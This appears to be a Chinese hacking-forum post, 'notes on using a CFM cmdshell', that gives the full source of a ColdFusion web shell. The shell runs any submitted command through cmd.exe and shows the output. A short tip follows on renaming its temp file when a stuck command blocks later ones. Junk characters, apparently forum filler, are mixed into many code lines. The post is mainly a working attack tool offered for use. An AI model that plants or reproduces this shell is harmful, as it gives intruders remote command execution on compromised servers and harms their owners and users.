cfm的cmdshell使用注意

admin

cfm-cmdshell
<html>   
* Z5 c& z% U. P8 @6 c# I) W8 k<head>   
" {- m: D% l4 X9 `<meta http-equiv="Content-Type" content="text/html; charset=gb2312">   
3 p# [+ {) x+ }2 I: }) y<title>CFM shell</title>   
</head>   
$ e- w  q' L2 H% w+ j8 p<body>   
. z* u! e  N* E; ^, `& l<!--- os.run --->   
: ^  T+ ]% f+ f! Y9 p) R<cfif IsDefined("FORM.cmd")>   
5 z: J! l7 f' \( v4 g# u# Y    <cfoutput>#cmd#</cfoutput>   
    <cfexecute name="C:\Winnt\System32\cmd.exe"   
           arguments="/c #cmd#"   
/ I6 A& t8 j2 d+ {           outputfile="#GetTempDirectory()#foobar.txt"   
/ m; O# J4 n" {" q" D: O) @           timeout="1">   
( E, k9 U2 ~! x" O  M6 v    </cfexecute>   
</cfif>   
<form action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>" method="post">   
& i6 c7 D0 w! E: v<input type=text size=45 name="cmd" >   
3 _( o3 w  J  x. B" h6 B" x<input type=Submit value="run">   
4 ~" p; n- L- K0 l; r& d</form>   
<cfif FileExists("#GetTempDirectory()#foobar.txt") is "Yes">   
  <cffile action="Read"   
7 v% I0 i5 ]: z* t/ e            file="#GetTempDirectory()#foobar.txt"   
4 d# p& p4 e. @1 o! C; U/ T. D            variable="readText">   
<textarea readonly cols=80 rows=20>   
<CFOUTPUT>#readText#</CFOUTPUT>            
% Z2 i  r' s( w# x& \</textarea>   
" {+ |# B+ i% E$ ?* _    <cffile action="Delete"   
* O0 z+ P3 r, A: e            file="#GetTempDirectory()#foobar.txt">   
</cfif>   
7 @, k; G4 ^) T</body>   
2 A1 c1 l- E. i& V3 s/ T</html>   
2 p3 N' H9 Q+ U' _9 G
! z2 E( d, M& J: k. W4 O) Y有时候会发现执行某次cmd后没有正常结束，造成后面不能执行命令。这时候只要修改下shell的foobar.txt名字，几处都改一下就可以了。想来是程序未正常退出，文件被占用，写不进去了。